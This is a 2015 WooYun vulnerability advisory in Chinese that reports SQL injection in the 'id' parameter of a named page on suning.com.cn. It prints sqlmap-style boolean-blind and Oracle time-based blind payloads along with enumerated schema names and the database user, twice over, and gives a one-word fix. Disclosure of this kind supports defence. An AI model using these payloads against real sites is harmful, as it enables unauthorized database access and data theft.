当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118695

漏洞标题:苏宁环球主站SQL注入

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: 玉林嘎

提交时间:2015-06-08 14:46

修复时间:2015-07-23 15:18

公开时间:2015-07-23 15:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-08: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

rt

详细说明:

苏宁环球主站 一处注入
http://www.suning.com.cn/article/noticshow.html?id=91551506020556 参数id存在注入

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=91551506020556 AND 6801=6801
Type: AND/OR time-based blind
Title: Oracle OR time-based blind
Payload: id=-4193 OR 5223=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(89)||CHR(115)||CHR(88),5)
---
[20:52:18] [INFO] the back-end DBMS is Oracle
web application technology: Nginx
back-end DBMS: Oracle


current user:    'NC35'


[20:52:30] [INFO] retrieved: 19
[20:53:32] [INFO] retrieved: CTXSYS
[20:58:22] [INFO] retrieved: DBSNMP
[21:03:12] [INFO] retrieved: DMSYS
[21:07:08] [INFO] retrieved: EXFSYS
[21:11:59] [INFO] retrieved: IUFOV5
[21:16:38] [INFO] retrieved: IUFOV56


盲注太慢 证明即可
找不到地方交只能交给苏宁易购 麻烦通知下

漏洞证明:

苏宁环球主站 一处注入
http://www.suning.com.cn/article/noticshow.html?id=91551506020556 参数id存在注入

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=91551506020556 AND 6801=6801
Type: AND/OR time-based blind
Title: Oracle OR time-based blind
Payload: id=-4193 OR 5223=DBMS_PIPE.RECEIVE_MESSAGE(CHR(120)||CHR(89)||CHR(115)||CHR(88),5)
---
[20:52:18] [INFO] the back-end DBMS is Oracle
web application technology: Nginx
back-end DBMS: Oracle


current user:    'NC35'


[20:52:30] [INFO] retrieved: 19
[20:53:32] [INFO] retrieved: CTXSYS
[20:58:22] [INFO] retrieved: DBSNMP
[21:03:12] [INFO] retrieved: DMSYS
[21:07:08] [INFO] retrieved: EXFSYS
[21:11:59] [INFO] retrieved: IUFOV5
[21:16:38] [INFO] retrieved: IUFOV56


盲注太慢 证明即可
找不到地方交只能交给苏宁易购 麻烦通知下

修复方案:

过滤

版权声明:转载请注明来源 玉林嘎@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-08 15:16

厂商回复:

感谢提交,此域名非苏宁易购站点。

最新状态:

暂无